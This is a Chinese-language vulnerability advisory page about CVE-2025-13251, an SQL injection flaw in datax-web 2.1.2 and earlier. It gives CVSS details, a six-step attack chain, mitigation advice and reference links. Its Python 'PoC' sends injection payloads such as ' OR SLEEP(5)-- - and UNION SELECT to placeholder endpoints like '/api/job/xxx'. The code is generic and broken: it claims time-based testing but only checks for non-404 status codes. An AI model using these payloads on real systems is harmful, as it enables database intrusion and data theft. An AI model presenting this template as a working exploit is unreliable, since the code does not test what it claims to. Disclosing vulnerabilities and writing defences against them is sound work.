CVE-2025-13251 | WeiYe-Jing datax-web SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13251

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WeiYe-Jing datax-web

漏洞概述

CVE-2025-13251是WeiYe-Jing datax-web存在的一个SQL注入漏洞。该漏洞影响datax-web 2.1.2及之前版本，攻击者可以通过远程方式利用此漏洞执行SQL注入攻击。datax-web是一个基于DataX的分布式数据同步工具，用于解决各种数据源之间的数据同步问题。由于系统中未对用户输入进行充分的过滤和参数化处理，攻击者可以通过构造恶意的SQL语句来获取数据库中的敏感信息、修改数据或在某些情况下执行系统命令。该漏洞的CVSS评分为6.3，属于中等严重程度，攻击复杂度低，且不需要用户交互，攻击者只需拥有低权限账户即可发起攻击。漏洞已于2025年11月16日公开披露， exploits已发布，厂商应及时发布安全更新修复此漏洞。

技术细节

该SQL注入漏洞存在于datax-web的未知功能模块中，攻击者可以通过操纵特定参数或请求来注入恶意SQL代码。由于应用程序在处理用户输入时未使用参数化查询或适当的输入验证，攻击者可以绕过前端的简单过滤机制。在CVSS 3.1评分体系中，该漏洞的攻击向量为网络可利用(AV:N)，攻击复杂度低(AC:L)，需要低权限(PR:L)认证，无需用户交互(UI:N)，对机密性(C:L)、完整性(I:L)和可用性(A:L)均造成低影响。攻击者利用此漏洞可以：(1) 枚举数据库结构和表信息；(2) 提取用户凭证和其他敏感数据；(3) 修改或删除数据库记录；(4) 在某些配置下可能实现远程代码执行。漏洞影响WeiYe-Jing datax-web 2.1.2及所有之前版本。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者通过搜索引擎（如Shodan、Censys）或漏洞数据库获取使用datax-web的目标系统信息

STEP 2

步骤2

识别目标：访问目标系统的Web界面，确认datax-web版本信息（<=2.1.2）

STEP 3

步骤3

认证获取：使用低权限账户登录系统（如果需要认证）或直接访问漏洞接口

STEP 4

步骤4

漏洞利用：构造恶意SQL注入payload，通过HTTP请求发送到目标接口

STEP 5

步骤5

数据提取：利用UNION注入或布尔盲注技术提取数据库中的敏感信息（用户表、配置信息等）

STEP 6

步骤6

权限提升：在获取数据库凭证后，尝试横向移动或进一步利用获取更高权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-13251 PoC - WeiYe-Jing datax-web SQL Injection
Reference: https://vuldb.com/?id.332585
"""

import requests
import sys

target = "http://target-ip:port"  # Target URL

def test_sql_injection(url):
    """
    Test for SQL injection vulnerability in datax-web
    """
    # Common injection payloads for time-based blind SQL injection
    payloads = [
        "' OR SLEEP(5)-- -",
        "' OR 1=1-- -",
        "' UNION SELECT NULL-- -",
        "admin'-- -"
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    print(f"[*] Testing SQL injection on {url}")
    
    for payload in payloads:
        try:
            # Test common endpoint patterns
            endpoints = [
                '/datax-web/api/xxx',
                '/api/job/xxx',
                '/job/xxx'
            ]
            
            for endpoint in endpoints:
                full_url = url + endpoint
                data = {'param': payload}
                
                response = requests.post(
                    full_url, 
                    data=data, 
                    headers=headers, 
                    timeout=10,
                    verify=False
                )
                
                if response.status_code != 404:
                    print(f"[+] Payload: {payload}")
                    print(f"[+] Endpoint: {endpoint}")
                    print(f"[+] Status: {response.status_code}")
                    print(f"[+] Response length: {len(response.text)}")
                    
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    test_sql_injection(target)

影响范围

WeiYe-Jing datax-web <= 2.1.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：(1) 在Web应用防火墙或反向代理上配置SQL注入检测和阻断规则；(2) 禁用不必要的API接口或限制访问IP范围；(3) 对数据库账户权限进行限制，避免web应用账户具有DBA或管理员权限；(4) 加强应用日志监控，及时发现异常的SQL注入尝试行为；(5) 考虑使用数据库防火墙产品对SQL注入进行实时防护。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13251
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13251
3 Details https://www.cvedetails.com/cve/CVE-2025-13251/
4 VulDB https://vuldb.com/cve/CVE-2025-13251
5 Link https://github.com/Xzzz111/exps/blob/main/archives/datax-web-sql-injection-1/report.md
6 Link https://vuldb.com/?ctiid.332585
7 Link https://vuldb.com/?id.332585
8 Link https://vuldb.com/?submit.687606